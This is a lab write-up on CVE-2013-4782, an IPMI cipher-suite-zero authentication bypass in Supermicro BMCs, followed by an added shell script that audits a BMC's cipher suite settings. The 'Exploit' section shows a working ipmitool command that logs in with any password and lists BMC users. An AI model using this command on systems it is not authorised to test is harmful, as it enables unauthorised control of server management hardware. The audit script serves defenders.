CVE-2013-4782


A vulnerability classified as very critical has been found in Supermicro BMC (the affected version is unknown). It affects an unknown function. Manipulation with an unknown input leads to an improper authentication vulnerability. CWE classifies the issue as CWE-287: when an actor claims to have a given identity, the software does not prove, or insufficiently proves, that the claim is correct. This impacts confidentiality, integrity, and availability.

Exploit


┌──(kali㉿kali)-[~/archive/htb/labs/shibboleth]
└─$ ipmitool -I lanplus -C 0 -H $IP -U Administrator -P blahblahblah user list
IANA PEN registry open failed: No such file or directory
ID  Name	     Callin  Link Auth	IPMI Msg   Channel Priv Limit
1                    true    false      false      USER
2   Administrator    true    false      true       USER
3                    true    false      false      Unknown (0x00)
[...REDACTED...]
SIGN INT: Close Interface IPMI v2.0 RMCP+ LAN Interface

This is easily done with ipmitool by passing the -C flag with the argument 0. The Administrator user is present at ID 2.
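From the defender's side, the same cipher suite 0 setting can be audited on a BMC you administer by reading the cipher suite lines of `ipmitool lan print`. The script below is an added example, not part of the original notes; the sample output is constructed, and `<channel>` is a placeholder for the LAN channel number.

```bash
#!/bin/sh
# Added example (not from the original page): audit `ipmitool lan print`
# output for cipher suite 0, the suite selected by `-C 0` above.
# Exit status: 0 = cipher 0 unusable, 1 = cipher 0 usable, 2 = unparseable.

check_cipher_zero() {
    suites="" privs=""
    while IFS= read -r line; do
        case "$line" in
            "RMCP+ Cipher Suites"*)   suites=$(printf '%s' "${line#*:}" | tr -d ' \t\r') ;;
            "Cipher Suite Priv Max"*) privs=$(printf '%s' "${line#*:}" | tr -d ' \t\r') ;;
        esac
    done
    # The privilege list is always 15 characters; anything else
    # (missing line, "Not Available") cannot be judged.
    if [ -z "$suites" ] || [ "${#privs}" -ne 15 ]; then
        echo "UNKNOWN: cipher suite lines not found or malformed"
        return 2
    fi
    case ",$suites," in
        *,0,*) ;;   # suite 0 is advertised, keep checking
        *) echo "OK: cipher suite 0 not advertised"; return 0 ;;
    esac
    # Per the ipmitool man page, the first character of the privilege list
    # is the maximum privilege for cipher suite 0; 'X' marks it unused.
    zero_priv=$(printf '%s' "$privs" | cut -c1)
    if [ "$zero_priv" = "X" ]; then
        echo "OK: cipher suite 0 advertised but marked unused"
        return 0
    fi
    echo "VULNERABLE: cipher suite 0 usable up to privilege '$zero_priv'"
    echo "suggested: ipmitool lan set <channel> cipher_privs X${privs#?}"
    return 1
}

sample_lan_print() {   # constructed excerpt, not captured from a real BMC
    cat <<'EOF'
IP Address              : 192.0.2.10
RMCP+ Cipher Suites     : 0,1,2,3,6,7,8,11,12
Cipher Suite Priv Max   : aaaaaaaaaaaaaaa
                        :     X=Cipher Suite Unused
                        :     a=ADMIN
EOF
}

sample_lan_print | check_cipher_zero || echo "exit status: $?"
```

On a live system, pipe `ipmitool lan print <channel>` into `check_cipher_zero` instead of the sample.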